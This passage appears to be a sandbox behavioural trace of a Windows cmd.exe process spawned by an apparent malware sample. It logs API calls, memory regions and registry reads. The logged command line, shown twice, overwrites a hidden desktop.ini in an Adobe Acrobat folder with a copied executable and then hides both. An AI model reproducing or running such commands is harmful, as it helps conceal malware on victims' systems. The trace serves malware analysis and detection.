lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.132] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.133] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] 
GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 
[0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x32, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x32, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.134] _close 
(_FileHandle=4) returned 0 [0146.134] FindNextFileW (in: hFindFile=0x3a0ec8, lpFindFileData=0x1cf324 | out: lpFindFileData=0x1cf324) returned 0 [0146.135] GetLastError () returned 0x12 [0146.135] FindClose (in: hFindFile=0x3a0ec8 | out: hFindFile=0x3a0ec8) returned 1 [0146.135] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.338] _close (_FileHandle=3) returned 0 [0146.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.338] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.339] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.339] SetConsoleInputExeNameW () returned 0x1 [0146.339] GetConsoleOutputCP () returned 0x1b5 [0146.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.339] exit (_Code=0) Process: id = "203" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17715 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17716 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17717 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17718 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 17719 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17720 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17721 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17722 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17723 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" 
Region: id = 17724 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17797 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17798 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17799 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17800 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17801 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 17802 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17803 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17804 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17805 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17806 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17807 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17808 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17809 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17810 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17811 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 17812 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17813 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17814 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17815 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17816 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000e0000" filename = "" Region: id = 17817 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 17818 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 17819 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 17820 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 17884 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 263 os_tid = 0xa94 [0146.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8ac | out: lpSystemTimeAsFileTime=0x26f8ac*(dwLowDateTime=0x910ce8a0, dwHighDateTime=0x1d440a9)) [0146.155] GetCurrentProcessId () returned 0xac8 [0146.155] GetCurrentThreadId () returned 0xa94 [0146.155] GetTickCount () returned 0x2d7d7 [0146.155] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8a4 | out: lpPerformanceCount=0x26f8a4*=20294414292) returned 1 [0146.156] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.156] __set_app_type (_Type=0x1) [0146.156] __p__fmode () returned 0x76b331f4 [0146.156] __p__commode () returned 0x76b331fc [0146.156] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.156] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.156] GetCurrentThreadId () returned 0xa94 [0146.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, 
dwThreadId=0xa94) returned 0x38 [0146.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.157] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.157] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f83c | out: phkResult=0x26f83c*=0x0) returned 0x2 [0146.157] VirtualQuery (in: lpAddress=0x26f873, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.157] GetConsoleOutputCP () returned 0x1b5 [0146.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0146.157] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.158] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.158] GetEnvironmentStringsW () returned 0x4205d0* [0146.158] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.159] GetEnvironmentStringsW () returned 0x4205d0* [0146.159] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7ac | out: phkResult=0x26e7ac*=0x40) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x80, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x0, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegCloseKey (hKey=0x40) returned 0x0 [0146.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7ac | out: phkResult=0x26e7ac*=0x40) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x0, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.160] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.160] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.160] RegCloseKey (hKey=0x40) returned 0x0 [0146.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.160] srand (_Seed=0x5b886374) [0146.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" [0146.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" 